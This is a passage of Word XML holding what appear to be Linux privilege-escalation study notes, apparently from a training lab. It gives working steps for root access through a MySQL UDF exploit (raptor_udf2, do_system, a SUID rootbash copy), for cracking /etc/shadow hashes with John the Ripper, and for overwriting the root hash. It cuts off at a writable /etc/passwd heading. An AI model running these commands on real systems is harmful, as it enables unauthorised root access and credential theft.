        <w:t>cd /home/user/tools/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql-udf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62161EEB" w14:textId="5272F46E" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>raptor_udf2.c exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17FAB4" w14:textId="558D9612" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152D041" w14:textId="77777777" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -g -c raptor_udf2.c -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33C3086E" w14:textId="78BD110B" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -g -shared -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wl,-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843D872" w14:textId="39338B87" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>connect to MySQL service as the root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C81AE" w14:textId="011BA85F" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16E855" w14:textId="5C6755D3" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create a UDF via MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE98B7" w14:textId="77777777" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07C584C4" w14:textId="77777777" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">create table </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>foo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>line blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F831657" w14:textId="77777777" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>insert into foo values(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>('/home/user/tools/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql-udf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/raptor_udf2.so')</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22FCD7DB" w14:textId="77777777" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">select * from foo into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dumpfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/plugin/raptor_udf2.so</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="035458D2" w14:textId="4BABC760" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">create function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>do_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> returns integer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>soname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 'raptor_udf2.so</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="180C98E0" w14:textId="47C25D98" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>copy to function and set SUID permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D5F6C" w14:textId="639F576A" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>do_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>'cp /bin/bash /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E97611" w14:textId="0E098A32" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F076613" w14:textId="17945FB1" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227C3D2" w14:textId="46BE8882" w:rsidR="002A15B5" w:rsidRPr="0084205E" w:rsidRDefault="002A15B5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687B281" w14:textId="7F70F1EA" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>remove exploit and shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD8C14" w14:textId="3987EB00" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E4F394A" w14:textId="55F9097C" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEDC62B" w14:textId="579908F5" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak File Permissions – Readable /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F98E93" w14:textId="25F49C8A" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>check via ls -l /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34261015" w14:textId="302C58E1" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>abnormal permissions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-r- - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A85AF" w14:textId="6241308F" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view contents via cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F0CAF7" w14:textId="505BCB8D" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">save hash and crack with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>JtR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C9CB437" w14:textId="202306FB" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF931D" w14:textId="2F709FDE" w:rsidR="007644E2" w:rsidRPr="0084205E" w:rsidRDefault="007644E2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>login as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1DF65" w14:textId="6E2CAA7A" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="00E773B1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak File Permissions – Writable /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42950FB1" w14:textId="6D7C5976" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="00E773B1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>generate a new password hash with password of choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680E50C" w14:textId="23ED6FCC" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="00E773B1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mkpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -m sha-512 &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6A22D" w14:textId="06F4836B" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="00E773B1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>edit root hash in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow with new hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6257C4" w14:textId="66952DA9" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="00E773B1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>login with new password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04058C88" w14:textId="5299254C" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="00E773B1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak File Permissions - Writable /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27C58D" w14:textId="69CD5EBF" w:rsidR="00E773B1" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
